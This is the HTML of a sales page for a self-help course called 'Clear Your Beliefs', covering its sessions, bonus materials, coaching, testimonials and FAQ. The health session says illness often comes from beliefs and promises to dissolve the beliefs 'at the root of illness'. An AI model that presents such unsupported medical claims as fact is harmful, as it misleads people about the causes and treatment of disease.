aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// 